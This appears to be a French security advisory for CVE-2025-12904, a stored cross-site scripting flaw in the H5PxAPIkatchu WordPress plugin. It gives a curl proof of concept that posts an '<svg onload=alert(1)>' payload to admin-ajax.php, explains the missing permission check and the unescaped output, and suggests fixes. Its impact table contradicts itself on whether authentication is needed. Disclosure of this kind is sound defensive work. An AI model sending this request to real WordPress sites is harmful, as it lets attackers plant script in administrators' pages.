
Divulgation pour CVE-2025-12904
Divulgation pour CVE-2025-12904
Ce dépôt divulgue une vulnérabilité découverte dans SNORDIAN's H5PxAPIkatchu <= 0.4.16, un plugin WordPress développé par otacke.
| ID CVE | Type | Composant | Impact |
|---|
| CVE-2025-12904 | Cross-Site Scripting stocké non authentifié via insert_data | class-table-view.php | Un attaquant authentifié peut exécuter du JS |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※Si l'id dans l'objet n'existe pas, cela échouera.
La fonction insert_data() n'effectuait aucune vérification de permissions, permettant à des entrées malveillantes d'être sauvegardées sans authentification. De plus, ces entrées étaient affichées sans échappement sur l'interface d'administration.
insert_data() utilise current_user_can pour empêcher l'exécution non autorisée.esc_html($value) au lieu de echo $value, vous pouvez empêcher l'exécution de XSS.Il a été très difficile de créer le PoC.
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
J'ai passé beaucoup de temps à reproduire cette partie. Je voudrais mieux maîtriser la commande curl. Et sinon ce plugin... tout va bien ? Surtout le nom, hein.
Nom: MooseLove
Rôle: Chercheur en sécurité indépendant / chasseur de bugs
Contact: Disponible sur demande
Cet avis est fourni pour la sensibilisation à la sécurité publique. Libre à partager avec attribution.